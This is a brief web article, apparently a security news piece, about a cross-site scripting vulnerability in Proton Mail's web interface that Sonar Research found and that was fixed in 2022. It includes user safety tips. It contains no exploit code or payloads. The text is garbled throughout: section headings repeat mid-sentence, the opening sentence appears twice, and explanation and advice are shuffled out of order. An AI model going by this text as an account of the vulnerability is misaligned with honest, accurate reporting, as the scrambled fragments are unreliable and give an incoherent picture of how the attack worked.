The attack required a specific sequence of actions to succeed, which limited its real-world viability:
The Sonar Research team identified the vulnerability during a routine audit of Proton's open-source repositories. The issue stemmed from how the web application handled user-controlled HTML. While senders need the ability to style messages, failing to properly sanitize certain tags can allow malicious tags to execute in a reader's browser. How the Exploit Worked
Avoid clicking unexpected links in emails, even from seemingly secure providers. Proton Exploit
An attacker would need to send two carefully crafted emails to the target.
Ensure you are using the latest version of any Proton applications. The attack required a specific sequence of actions
The vulnerability was strictly limited to the web interface; non-web Proton Mail apps (iOS/Android) were never affected. Protecting Your Data
After researchers disclosed the bug in June 2022, Proton developed and deployed a fix by early July 2022. How the Exploit Worked Avoid clicking unexpected links
Analysis of spam and virus filter logs showed no evidence of the exploit being used in the wild by malicious actors.